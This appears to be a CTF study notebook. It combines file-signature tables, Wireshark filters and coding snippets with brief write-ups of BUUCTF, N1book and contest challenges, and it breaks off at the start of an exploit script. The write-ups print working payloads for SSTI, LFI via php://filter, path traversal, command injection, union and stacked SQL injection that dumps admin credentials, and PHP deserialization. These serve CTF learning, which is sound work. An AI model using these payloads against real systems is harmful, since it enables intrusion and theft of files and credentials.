<tr><td>WAV audio file</td><td>.wav</td><td>52 49 46 46 RIFF</td></tr>
<tr><td>ELF Linux EXE</td><td>.elf</td><td>7F 45 4C 46 .ELF</td></tr>
<tr><td>Photoshop Graphics</td><td>.psd</td><td>38 42 50 53 [8BPS]</td></tr>
<tr><td>Windows Meta File</td><td>.wmf</td><td>D7 CD C6 9A</td></tr>
<tr><td>MIDI file</td><td>.mid</td><td>4D 54 68 64 [MThd]</td></tr>
<tr><td>Icon file</td><td>.ico</td><td>00 00 01 00</td></tr>
<tr><td>MP3 file with ID3 identity tag</td><td>.mp3</td><td>49 44 33 [ID3]</td></tr>
<tr><td>AVI video file</td><td>.avi</td><td>52 49 46 46 [RIFF]</td></tr>
<tr><td>Flash Shockwave</td><td>.swf</td><td>46 57 53 [FWS]</td></tr>
<tr><td>Flash Video</td><td>.flv</td><td>46 4C 56 [FLV]</td></tr>
<tr><td>Mpeg 4 video file</td><td>.mp4</td><td>00 00 00 18 66 74 79 70 6D 70 34 32 [….ftypmp42]</td></tr>
<tr><td>MOV video file</td><td>.mov</td><td>6D 6F 6F 76 [….moov]</td></tr>
<tr><td>Windows Video file</td><td>.wmv</td><td>30 26 B2 75 8E 66 CF</td></tr>
<tr><td>Windows Audio file</td><td>.wma</td><td>30 26 B2 75 8E 66 CF</td></tr>
<tr><td>PKZip</td><td>.zip</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>GZip</td><td>.gz</td><td>1F 8B 08</td></tr>
<tr><td>Tar file</td><td>.tar</td><td>75 73 74 61 72</td></tr>
<tr><td>Microsoft Installer</td><td>.msi</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>Object Code File</td><td>.obj</td><td>4C 01</td></tr>
<tr><td>Dynamic Library</td><td>.dll</td><td>4D 5A [MZ]</td></tr>
<tr><td>CAB Installer file</td><td>.cab</td><td>4D 53 43 46 [MSCF]</td></tr>
<tr><td>Executable file</td><td>.exe</td><td>4D 5A [MZ]</td></tr>
<tr><td>RAR file</td><td>.rar</td><td>52 61 72 21 1A 07 00 [Rar!…]</td></tr>
<tr><td>SYS file</td><td>.sys</td><td>4D 5A [MZ]</td></tr>
<tr><td>Help file</td><td>.hlp</td><td>3F 5F 03 00 [?_..]</td></tr>
<tr><td>VMWare Disk file</td><td>.vmdk</td><td>4B 44 4D 56 [KDMV]</td></tr>
<tr><td>Outlook Post Office file</td><td>.pst</td><td>21 42 44 4E 42 [!BDNB]</td></tr>
<tr><td>PDF Document</td><td>.pdf</td><td>25 50 44 46 [%PDF]</td></tr>
<tr><td>Word Document</td><td>.doc</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>RTF Document</td><td>.rtf</td><td>7B 5C 72 74 66 31 [{ tf1]</td></tr>
<tr><td>Excel Document</td><td>.xls</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>PowerPoint Document</td><td>.ppt</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>Visio Document</td><td>.vsd</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>DOCX (Office 2010)</td><td>.docx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>XLSX (Office 2010)</td><td>.xlsx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>PPTX (Office 2010)</td><td>.pptx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>Microsoft Database</td><td>.mdb</td><td>53 74 61 6E 64 61 72 64 20 4A 65 74</td></tr>
<tr><td>Postcript File</td><td>.ps</td><td>25 21 [%!]</td></tr>
<tr><td>Outlook Message File</td><td>.msg</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>EPS File</td><td>.eps</td><td>25 21 50 53 2D 41 64 6F 62 65 2D 33 2E 30 20 45 50 53 46 2D 33 20 30</td></tr>
<tr><td>Jar File</td><td>.jar</td><td>50 4B 03 04 14 00 08 00 08 00</td></tr>
<tr><td>SLN File</td><td>.sln</td><td>4D 69 63 72 6F 73 6F 66 74 20 56 69 73 75 61 6C 20 53 74 75 64 69 6F 20 53 6F 6C 75 74 69 6F 6E 20 46 69 6C 65</td></tr>
<tr><td>Zlib File</td><td>.zlib</td><td>78 9C</td></tr>
<tr><td>SDF File</td><td>.sdf</td><td>78 9C</td></tr>
</tbody></table>
</div>
<h2 id="python各版本对应的magic头"><a class="header" href="#python各版本对应的magic头">python各版本对应的magic头</a></h2>
<pre><code class="language-sh">Python 2.7|03f30d0a 00000000
Python 3.0|3b0c0d0a 00000000
Python 3.1|4f0c0d0a 00000000
Python 3.2|6c0c0d0a 00000000
Python 3.3|9e0c0d0a 00000000 00000000
Python 3.4|ee0c0d0a 00000000 00000000
Python 3.5|170d0d0a 00000000 00000000
Python 3.6|330d0d0a 00000000 00000000
Python 3.7|420d0d0a 00000000 00000000 00000000
Python 3.8|550d0d0a 00000000 00000000 00000000
Python 3.9|610d0d0a 00000000 00000000 00000000
Python 3.10|6f0d0d0a 00000000 00000000 00000000
</code></pre>
<h2 id="mics-思维导图"><a class="header" href="#mics-思维导图">Mics 思维导图</a></h2>
<p><img src="../../img_list/ctf%E6%9D%82%E9%A1%B9%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE.png" alt="ctf-杂项-思维导图" /></p>
<h2 id="ascii表"><a class="header" href="#ascii表">ASCII表</a></h2>
<p><img src="../../img_list/ascii.png" alt="ascii" /></p>
<h2 id="dagger-alphabet"><a class="header" href="#dagger-alphabet">dagger alphabet</a></h2>
<p><img src="../../img_list/image20230714003015911.png" alt="image-20230714003015911" /></p>
<h2 id="use-wireshark-filter-data"><a class="header" href="#use-wireshark-filter-data">Use wireshark filter data</a></h2>
<pre><code class="language-sh">http.request.method == POST and http contains “admin”
ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 and ip.addr == 192.168.1.107
tcp.port == 80 and udp.dstport == 80 or tcp.srcport &lt;= 10000
tcp|udp|arp|icmp|http|smtp|ftp|dns|msnms|ip|ssl|not oicq|!bootp
eth.dst == A0:00:00:04:C5:84 and eth.src eq A0:00:00:04:C5:84 or eth.addr eq A0:00:00:04:C5:84
http.request.method == “GET” or http.request.method == “POST”
http.request.uri == “/img/logo-edu.gif” or http.request.uri contains “/img/logo-edu.gif” or http contains “GET”
</code></pre>
<h2 id="use-ctf-party"><a class="header" href="#use-ctf-party">Use ctf-party</a></h2>
<pre><code class="language-ruby">require 'ctf_party'
require 'base64'
'''
base64: to_b64, from_b64, b64? and bang versions
digest: md5, sha1, etc. and bang versions
flag: flag, flag!, flag? (apply/check a flag format)
rot: rot, rot13, rot_all and bang versions
hex: hex2dec, dec2hex, to_hex, from_hex, str2hex, hex2str, hex2bin, bin2hex, from_hexip, to_hexip and bang versions
case: randomcase, alternatecase and bang versions
cgi: urlencode, urlencode_component, urldecode, urldecode_component, htmlescape, htmlunescape and bang versions
bin: to_bin, from_bin, str2bin, bin2str, hex2bin, bin2hex and bang versions
leet: leet and bang version
dec: dec2str, str2dec, hex2dec, dec2hex and bang versions
xor: ulxor, alxor, urxor, arxor and bang versions
misc: istrip and bang version
'''
flag = 'flag{xs}'
p Base64.strict_encode64(flag)
p flag.flag?
p flag.to_b64!
p 'SGVsbG8gd29ybGQh'.b64?
p 'mystr'.rot13
p 'mystr'.rot(shift: 11)
p 'mystr'.sha2_512
p "flag".to_bin
p "https://xinghuo.xfyun.cn/desk".urlencode_component
# 定义一个数组
arr = [1, 2, 3, 4, 5]
# 使用 for 循环遍历数组
for i in 0..arr.length-1
# 如果 i 是偶数,打印 arr[i]
if i % 2 == 0
# p arr[i]
end
end
</code></pre>
<h2 id="use-dd"><a class="header" href="#use-dd">Use dd</a></h2>
<pre><code class="language-shell">dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名
#参数说明:
if=file #输入文件名,缺省为标准输入。
of=file #输出文件名,缺省为标准输出。
bs=bytes #同时设置读写块的大小为 bytes ,可代替 ibs 和 obs 。
skip=blocks #从输入文件开头跳过 blocks 个块后再开始复制。&lt;/hr&gt;
#以IDF实验室“抓到一只苍蝇”为例需要将获得的文件去除前364个字节
dd if=s1 bs=1 skip=364 of=d1&lt;/hr&gt;
#使用dd命令分离文件格式如下
dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名
</code></pre>
<h2 id="文件合并"><a class="header" href="#文件合并">文件合并</a></h2>
<pre><code class="language-sh">#将所有以chapter开头的文件按文件名从小到大的顺序合并输出到book文件中
cat chapter01 chapter02 chapter03 &gt; book
</code></pre>
<h2 id="file-headers"><a class="header" href="#file-headers">file headers</a></h2>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>let header_vec = vec![
("JPEG","FFD8FFE1"),
("png","89504E47"),
("gif","47494638"),
("tiff","49492A00"),
("bmp","424DC001"),
("zip","504B304"),
("rar","52617221"),
("psd","38425053"),
("rtf","785C727466"),
("xml","3C3F786D6C"),
("html","68746D6C3E"),
("pdf","2550444662D312E"),
("wav","57415645"),
("pcap","4D3C2B1A"),
];
<span class="boring">}</span></code></pre></pre>
<h2 id="image-rgb-分层"><a class="header" href="#image-rgb-分层">Image RGB 分层</a></h2>
<pre><code class="language-toml">[dependencies]
image = "0.23"
</code></pre>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>fn fen_rgb_ceng() {
// 载入原始图片并获取宽度和高度
let img = image::open("xx_00029.png").unwrap();
let (width, height) = img.dimensions();
// 创建三个空白的 Rgb 图层
let mut layer1 = image::RgbImage::new(width, height);
let mut layer2 = image::RgbImage::new(width, height);
let mut layer3 = image::RgbImage::new(width, height);
// 将原始图片中的像素值分离到三个图层中
for y in 0..height {
for x in 0..width {
let pixel = img.get_pixel(x, y);
layer1.get_pixel_mut(x, y).0[0] = pixel.0[0];
layer2.get_pixel_mut(x, y).0[1] = pixel.0[1];
layer3.get_pixel_mut(x, y).0[2] = pixel.0[2];
}
}
// 显示三个图层
layer1.save("output_layer1.png").unwrap();
layer2.save("output_layer2.png").unwrap();
layer3.save("output_layer3.png").unwrap();
}
<span class="boring">}</span></code></pre></pre>
<p>get RGBA vec</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>let image = image::open("xx_00034.png").unwrap();
let (width, height) = image.dimensions();
let mut rgba_vec:Vec&lt;(u8,u8,u8,u8)&gt; = vec![];
let mut buf :Vec&lt;u8&gt; = vec![];
for y in 0..height {
for x in 0..width {
let pixel = image.get_pixel(x, y);
let rgba = pixel.0;
if (rgba[0] ==254 &amp;&amp;rgba[1] ==254 &amp;&amp;rgba[2] ==254)||(rgba[0] ==0 &amp;&amp;rgba[1] ==0 &amp;&amp;rgba[2] ==0) {
rgba_vec.push((rgba[0],rgba[1],rgba[2],rgba[3]));
}
}
}
<span class="boring">}</span></code></pre></pre>
<p>create image from RGBA vec</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>fn create_image_from_rgba_vec(rgba_vec: Vec&lt;(u8, u8, u8, u8)&gt;) {
let width = f64::sqrt(rgba_vec.len() as f64) as u32;
let height = f64::sqrt(rgba_vec.len() as f64) as u32;
// 创建一张空白图片
let mut img: ImageBuffer&lt;Rgba&lt;u8&gt;, Vec&lt;_&gt;&gt; = ImageBuffer::new(width, height);
// 将 rgba_vec 中的颜色填充到图片上
for y in 0..height {
for x in 0..width {
let i = (y * width + x) as usize;
let rgba = rgba_vec[i];
img.get_pixel_mut(x, y).0 = [rgba.0, rgba.1, rgba.2,rgba.3];
}
}
// 保存图片
img.save("output.png").unwrap();
}
<span class="boring">}</span></code></pre></pre>
<h2 id="rsa-参数解释"><a class="header" href="#rsa-参数解释">RSA 参数解释</a></h2>
<p>RSA使用公钥与私钥配对来进行加密和解密。其中p、q 是两个大素数n=pqf(n)=(p-1)(q-1) 是欧拉函数值e 是与 f(n) 互质的整数d 是满足 e*d≡1(mod f(n)) 的整数m 是明文c 是密文</p>
<h2 id="ccompress-and-decompress-zlib"><a class="header" href="#ccompress-and-decompress-zlib">ccompress and decompress zlib</a></h2>
<pre><code class="language-python">import zlib
# 压缩数据
data = b'Hello, world!'
compressed_data = zlib.compress(data)
print('Compressed data:', compressed_data)
# 解压数据
uncompressed_data = zlib.uncompress(compressed_data)
print('Uncompressed data:', uncompressed_data)
</code></pre>
<h2 id="simple_ssti_1"><a class="header" href="#simple_ssti_1">Simple_SSTI_1</a></h2>
<pre><code># %27 means '
# %20 means space
http://114.67.175.224:11296/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
</code></pre>
<h2 id="simple_ssti_2"><a class="header" href="#simple_ssti_2">Simple_SSTI_2</a></h2>
<pre><code>http://114.67.175.224:16482/?flag={{config}}
flag{46fe7552dcee5c1bba675349353506d5}
</code></pre>
<h2 id="flask_fileupload"><a class="header" href="#flask_fileupload">Flask_FileUpload</a></h2>
<pre><code>1.echo "import os\nos.system('cat ./flag')" &gt; get_floag.txt
2.mv get_flag.txt get_flag.jpg
3.upload get_flag.jpg
flag{e58da7f2b3307deb9eb1d276cb8d524a}
</code></pre>
<h2 id="simple-image"><a class="header" href="#simple-image">Simple image</a></h2>
<pre><code>download the image
1.mv image.png image.html
2.cat image.html
3.get "107;&amp;#101;&amp;#121;&amp;#123;&amp;#121;&amp;#111;&amp;#117;&amp;#32;&amp;#97;&amp;#114;&amp;#101;&amp;#32;&amp;#114;&amp;#105;&amp;#103;&amp;#104;&amp;#116;&amp;#125" to Vec&lt;u8&gt;
4.decode Vec&lt;u8&gt; to string get key{you are right}
</code></pre>
<h1 id="shihua-write-up"><a class="header" href="#shihua-write-up">shihua Write up</a></h1>
<p>1.  hxxx
Flag:flag{flag_in_hexdecimal:)}
<img src="../../img_list/67ec08a2b61b488e90b3b8e7f8861e72tplvk3u1fbpfcpzoom1.png" alt="" />
3.  map
Flag:flag{mapisthekey}
<img src="../../img_list/1516932f69f04c37964401291e2ff5a0tplvk3u1fbpfcpzoom1.png" alt="" />
4.  bxxwxx
Flag:ctf{show_me_the_money}</p>
<pre><code>binwalk -e bxxwxx
cd _bxxwxx.extracted
cat flag.txt
</code></pre>
<p>5.  Zip0
Flag:flag{pseudo_encryption}</p>
<pre><code>use imhex open zip0.zip
remove password
save zip0.zip
open flag.png
</code></pre>
<p><img src="../../img_list/e8598a148e8a4d24af53e03e095042f5tplvk3u1fbpfcpzoom1.png" alt="" />
<img src="../../img_list/a1d750b73b9147ec873eec9dc8f17adatplvk3u1fbpfcpzoom1.png" alt="" />
6.  sxxxhxxx
flag:ctf{welcom_to_upc_im}</p>
<pre><code>steghide extract -sf stxxhxxx.jpeg
cat info
</code></pre>
<p><img src="../../img_list/863e3b69ded140809acd459002836899tplvk3u1fbpfcpzoom1.png" alt="" />
7.  Caesar
Flag:flag{this_is_rot_14:)}
<img src="../../img_list/7df6272003ee42148f74c45ffb0996b7tplvk3u1fbpfcpzoom1.png" alt="" />
8.  Vig
Flag:flag{vigenere_cipher}
<img src="../../img_list/9c507a09c94a4d4e8a3763240005fb64tplvk3u1fbpfcpzoom1.png" alt="" />
9.  xor
Flag:flag{flag1sxor}
<img src="../../img_list/7a8b79be0c1c479cab3022d2ddda0409tplvk3u1fbpfcpzoom1.png" alt="" />
10.  Easyre
Flag:flag{this_Is_a_EasyRe}
<img src="../../img_list/1433bcbbdde544c28ed706af89e99786tplvk3u1fbpfcpzoom1.png" alt="" /></p>
<h1 id="buuctf"><a class="header" href="#buuctf">BUUCTF</a></h1>
<h2 id="linux-labs-1"><a class="header" href="#linux-labs-1">Linux Labs 1</a></h2>
<pre><code>1.run "ssh -p 29381 root@node4.buuoj.cn" to connect ssh
2.enter password 123456
3.cd ..
4.cat flag.txt
flag{374920b5-66a9-4779-9172-5176eae58b85}
</code></pre>
<h2 id="buu-lfi-course-1"><a class="header" href="#buu-lfi-course-1">BUU LFI COURSE 1</a></h2>
<pre><code>http://81402a4e-a4c6-493f-b96e-8bf140d81bec.node4.buuoj.cn:81/?file=../../../flag
flag{241f21aa-3d5b-4540-9afb-3d1fd7da9197}
</code></pre>
<h2 id="buu-brute-1"><a class="header" href="#buu-brute-1">BUU BRUTE 1</a></h2>
<pre><code>url = "http://d1c5dde5-7e42-4f0a-a0a4-464717740958.node4.buuoj.cn:81/?username=admin&amp;password={1000..10000}"
1.for loop get body
2.if body contains("flag") println body
</code></pre>
<h2 id="buu-sql-course-1"><a class="header" href="#buu-sql-course-1">BUU SQL COURSE 1</a></h2>
<pre><code>1. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(username)%20from%20admin) to get username
2. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(password)%20from%20admin) to get user password
3. enter username and password clock login to see flag
</code></pre>
<h2 id="极客大挑战-2019easysql"><a class="header" href="#极客大挑战-2019easysql">[极客大挑战 2019]EasySQL</a></h2>
<pre><code>username:admin' or 1=1#
password:123456
flag{331c23f4-983a-4a29-b38a-d9c93b1734f2}
</code></pre>
<h2 id="hctf-2018warmup"><a class="header" href="#hctf-2018warmup">[HCTF 2018]WarmUp</a></h2>
<pre><code>1. ? URL ecode =&gt; %3F
2. %3F URL ecode =&gt; %253F
3. open url to get flag http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php%253F../../../../../ffffllllaaaagggg
4. or open http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg
</code></pre>
<h2 id="极客大挑战-2019havefun"><a class="header" href="#极客大挑战-2019havefun">[极客大挑战 2019]Havefun</a></h2>
<pre><code>1.open source code cansee this
`
&lt;!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
--&gt;
`
2. parse cat param http://352c414e-7254-40cc-b802-f66498fc1bd4.node4.buuoj.cn:81/?cat=dog get flag
</code></pre>
<h2 id="actf2020-新生赛include"><a class="header" href="#actf2020-新生赛include">[ACTF2020 新生赛]Include</a></h2>
<pre><code>1. click tip to open http://4237a679-489a-465c-9936-d7b0d68aba04.node4.buuoj.cn:81/?file=flag.php
2. open hackbar load url and change ?file=flag.php to ?file=php://filter/read=convert.base64-encode/resource=flag.php
3. copy base64 and open base_64.py decode base64 can see flag
</code></pre>
<h2 id="actf2020-新生赛exec"><a class="header" href="#actf2020-新生赛exec">[ACTF2020 新生赛]Exec</a></h2>
<pre><code>1.enter 127.0.0.1;ls click Enter can see we can run cmd
2.enter 127.0.0.1;ls ../../../;cat ../../../flag can get flag
flag{8d209996-9c2b-48e8-bdac-3b6ae15fb98b}
</code></pre>
<h2 id="强网杯-2019随便注"><a class="header" href="#强网杯-2019随便注">[强网杯 2019]随便注</a></h2>
<pre><code>1. enter "1';show databases#" and click submit can se all databases
2. enter "1';use supersqli;show tables#" and click submit canse all tables in supersqli
3. enter "1';use supersqli;show columns from `1919810931114514`#" and click submit
4. enter "1';use supersqli;show columns from words#" and click submit
5. enter "1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#" and click submit
6. enter "1' or 1=1#" an click can see flag
</code></pre>
<h2 id="gxyctf2019ping-ping-ping25"><a class="header" href="#gxyctf2019ping-ping-ping25">[GXYCTF2019]Ping Ping Ping25</a></h2>
<pre><code>1. URL/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php see source code cansee flag
</code></pre>
<h2 id="suctf-2019easysql"><a class="header" href="#suctf-2019easysql">[SUCTF 2019]EasySQL</a></h2>
<pre><code>1. enter "1;show databases;"
2. "1;show tables;"
3. "1;set sql_mode=pipes_as_concat;select 1"
</code></pre>
<h2 id="md5"><a class="header" href="#md5">MD5</a></h2>
<pre><code>https://buuoj.cn/challenges#MD5
1.unzip file and open .txt copy md5 code
2.open https://www.bejson.com/enc/md5dsc/ tp decode MD5 code
flag{admin1}
</code></pre>
<h2 id="一眼就解密"><a class="header" href="#一眼就解密">一眼就解密</a></h2>
<pre><code>https://buuoj.cn/challenges#%E4%B8%80%E7%9C%BC%E5%B0%B1%E8%A7%A3%E5%AF%86
1.canse it's a base64 code
2.so decode base64 can get the flag
</code></pre>
<h2 id="url编码"><a class="header" href="#url编码">Url编码</a></h2>
<pre><code>1.unzip file and open .txt copy url code
1.can find that is a URL encoded
2.so decode the code
flag{and 1=1}
</code></pre>
<h2 id="看我回旋踢"><a class="header" href="#看我回旋踢">看我回旋踢</a></h2>
<pre><code>1.unzip file and open .txt copy url code
1.can find that is a synt encoded 凯撒密码
2.so decode the code use python/caesar_cipher.py
flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1}
</code></pre>
<h2 id="摩丝"><a class="header" href="#摩丝">摩丝</a></h2>
<pre><code>1. unzip file and open .txt copy morse code
2. decode morse code with rust can get the flag
flag{ILOVEYOU}
</code></pre>
<h2 id="password"><a class="header" href="#password">password</a></h2>
<pre><code>1. unzip file and open .txt
2. can see the kay is 10 letter
3. so 张三 to zs and key{zs19900315}
flag{zs19900315}
</code></pre>
<h2 id="极客大挑战-2019secret-file"><a class="header" href="#极客大挑战-2019secret-file">[极客大挑战 2019]Secret File</a></h2>
<pre><code>1. open and view page source
2. open URL/Archive_room.php and view page source
3. copy URL/action.php open 3 times
4. open fiddler click URL/action.php can see
`
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;!--
secr3t.php
--&gt;
&lt;/html&gt;
`
5. open URL/secr3t.php can see flag.php but can't see it
6. so open URL/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
7. decode base64 can get flag
flag{9835de9d-5d61-4551-9b44-0c1955464828}
</code></pre>
<h2 id="极客大挑战-2019lovesql"><a class="header" href="#极客大挑战-2019lovesql">[极客大挑战 2019]LoveSQL</a></h2>
<pre><code>1. open URL/check.php?username=admin' or '1'='1&amp;password=1
2. open URL/check.php?username=1' union select 1,2,3%23&amp;password=1
3. open URL/check.php?username=1' union select 1,database(),version()%23&amp;password=1
4. open URL/check.php?username=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 %23&amp;password=1 get geekuser is password
5. open URL /check.php?username=1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from geek.l0ve1ysq1 %23&amp;password=1
os open /check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&amp;password=1
can see flag
</code></pre>
<h1 id="n1book-题目"><a class="header" href="#n1book-题目">N1book 题目</a></h1>
<h2 id="第一章web-第一题"><a class="header" href="#第一章web-第一题">第一章Web 第一题</a></h2>
<p>本测试题来自N1BOOK考察常见的信息收集能力。flag被分割成3块藏在3处你能都找出来么</p>
<pre><code class="language-sh">dirsearch -u http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/
</code></pre>
<p><img src="../../img_list/image2023060512021724116859385699101.png" alt="image-20230605120217241" />
open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/flag1_is_her3_fun.txt get flag1 flag{info_1</p>
<pre><code class="language-sh">#get flag3
vim -r index.php.swp
# p0rtant_hack}
</code></pre>
<p><img src="../../img_list/image2023060511595739916859385780262.png" alt="image-20230605115957399" />
open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/index.php~ get flag2 s_v3ry_im
flag{info_1s_v3ry_imp0rtant_hack}</p>
<h1 id="ctf-初赛-writeup"><a class="header" href="#ctf-初赛-writeup">CTF 初赛 WriteUP</a></h1>
<h2 id="1-签到"><a class="header" href="#1-签到">1 签到</a></h2>
<pre><code class="language-sh">strings qiandao.bmp
</code></pre>
<p><img src="../../img_list/image20230606161057495.png" alt="image-20230606161057495" />
flag{c545574d-9ce4-4ce7-997c-1f281d54a7c2}</p>
<h2 id="2-arp-1"><a class="header" href="#2-arp-1">2 ARP-1</a></h2>
<p>分析流量包发现只有一个字母变化
<img src="../../img_list/image20230606162223573.png" alt="image-20230606162223573" />
flag{2cbd116b-5fe9-4252-b9d9-7d794a519d59}</p>
<h2 id="5-cc_1"><a class="header" href="#5-cc_1">5 cc_1</a></h2>
<p>已知
<img src="../../img_list/image20230606161312058.png" alt="image-20230606161312058" />
点击魔法棒
<img src="../../img_list/image20230606161517274.png" alt="image-20230606161517274" />
得到flag
<img src="../../img_list/image20230606161605814.png" alt="image-20230606161605814" />
flag{e84a3130-c4b9-492c-9ab2-d395a43cbc31}</p>
<h2 id="8-re_ez"><a class="header" href="#8-re_ez">8 re_ez</a></h2>
<p>用ghidra打开re1.exe,经过分析发现在.data section存在一下数据</p>
<pre><code>// .data
// ram:14002a000-ram:14002a1ff
//
DAT_14002a000 XREF[1]: 14000024c(*)
14002a000 01 ?? 01h
14002a001 00 ?? 00h
14002a002 00 ?? 00h
14002a003 00 ?? 00h
14002a004 00 ?? 00h
14002a005 00 ?? 00h
14002a006 00 ?? 00h
14002a007 00 ?? 00h
14002a008 01 ?? 01h
14002a009 00 ?? 00h
14002a00a 00 ?? 00h
14002a00b 00 ?? 00h
14002a00c 00 ?? 00h
14002a00d 00 ?? 00h
14002a00e 00 ?? 00h
14002a00f 00 ?? 00h
14002a010 01 ?? 01h
14002a011 00 ?? 00h
14002a012 00 ?? 00h
14002a013 00 ?? 00h
14002a014 01 ?? 01h
14002a015 00 ?? 00h
14002a016 00 ?? 00h
14002a017 00 ?? 00h
14002a018 00 ?? 00h
14002a019 00 ?? 00h
14002a01a 00 ?? 00h
14002a01b 00 ?? 00h
14002a01c 01 ?? 01h
14002a01d 00 ?? 00h
14002a01e 00 ?? 00h
14002a01f 00 ?? 00h
14002a020 00 ?? 00h
14002a021 00 ?? 00h
14002a022 00 ?? 00h
14002a023 00 ?? 00h
14002a024 01 ?? 01h
14002a025 00 ?? 00h
14002a026 00 ?? 00h
14002a027 00 ?? 00h
14002a028 01 ?? 01h
14002a029 00 ?? 00h
14002a02a 00 ?? 00h
14002a02b 00 ?? 00h
14002a02c 00 ?? 00h
14002a02d 00 ?? 00h
14002a02e 00 ?? 00h
14002a02f 00 ?? 00h
14002a030 01 ?? 01h
14002a031 00 ?? 00h
14002a032 00 ?? 00h
14002a033 00 ?? 00h
14002a034 00 ?? 00h
14002a035 00 ?? 00h
14002a036 00 ?? 00h
14002a037 00 ?? 00h
14002a038 01 ?? 01h
14002a039 00 ?? 00h
14002a03a 00 ?? 00h
14002a03b 00 ?? 00h
14002a03c 01 ?? 01h
14002a03d 00 ?? 00h
14002a03e 00 ?? 00h
14002a03f 00 ?? 00h
14002a040 00 ?? 00h
14002a041 00 ?? 00h
14002a042 00 ?? 00h
14002a043 00 ?? 00h
14002a044 00 ?? 00h
14002a045 00 ?? 00h
14002a046 00 ?? 00h
14002a047 00 ?? 00h
14002a048 00 ?? 00h
14002a049 00 ?? 00h
14002a04a 00 ?? 00h
14002a04b 00 ?? 00h
14002a04c 01 ?? 01h
14002a04d 00 ?? 00h
14002a04e 00 ?? 00h
14002a04f 00 ?? 00h
14002a050 01 ?? 01h
14002a051 00 ?? 00h
14002a052 00 ?? 00h
14002a053 00 ?? 00h
14002a054 01 ?? 01h
14002a055 00 ?? 00h
14002a056 00 ?? 00h
14002a057 00 ?? 00h
14002a058 01 ?? 01h
14002a059 00 ?? 00h
14002a05a 00 ?? 00h
14002a05b 00 ?? 00h
14002a05c 01 ?? 01h
14002a05d 00 ?? 00h
14002a05e 00 ?? 00h
14002a05f 00 ?? 00h
14002a060 01 ?? 01h
14002a061 00 ?? 00h
14002a062 00 ?? 00h
14002a063 00 ?? 00h
</code></pre>
<p>由于提示迷宫为5*5把上面的数据每五个一组得到下面的数据</p>
<pre><code>1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 0000 0000 1000
1000 1000 1000 1000 1000
</code></pre>
<p>在伪代码 sub_140001130()函数发现了
<img src="../../img_list/image20230608145330026.png" alt="image-20230608145330026" />
把后面的零去掉得到</p>
<pre><code>1 0 1 0 1 #左上0是迷宫入库右上0是迷宫出口
1 0 1 0 1
1 0 1 0 1
1 0 0 0 1
1 1 1 1 1
# “ ! space
上 下 左 右
得到
"""spacespace### =&gt;""" ###
</code></pre>
<p>ghidra 看strings发现flag是迷宫的md5值
<img src="../../img_list/image20230606165635939.png" alt="image-20230606165635939" />
得到
<img src="../../img_list/image20230606170144258.png" alt="image-20230606170144258" />
flag{c4eb11b0e0a3cbeed7df057deaec18aa}</p>
<h2 id="just-serialize"><a class="header" href="#just-serialize">just serialize</a></h2>
<p>task.php</p>
<pre><code class="language-php">&lt;?php
show_source(__FILE__);
class Secret
{
public $filename;
public function __construct($filename)
{
$this-&gt;filename = $filename;
}
public function __toString()
{
$num = count(scandir($this-&gt;filename));
if ($num &gt; 0) {
return '什么也没有';
} else {
return 'flag_';
}
}
}
class Read
{
public $text = '什么东西';
public function __destruct()
{
echo $this-&gt;text;
}
}
$a = unserialize($_GET['p']);
</code></pre>
<p>paylaod.php</p>
<pre><code class="language-php">&lt;?php
class Secret
{
public $filename;
}
class Read
{
public $text;
}
$a = new Read();
$b = new Secret();
$b-&gt;filename = "glob://flag_xxskxnsknxakbsx.txt.*";
$a-&gt;text =$b;
echo "\n";
echo serialize($a);
// O:4:"Read":1:{s:4:"text";O:6:"Secret":1:{s:8:"filename";s:33:"glob://flag_xxskxnsknxakbsx.txt.*";}}
?&gt;
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">import requests
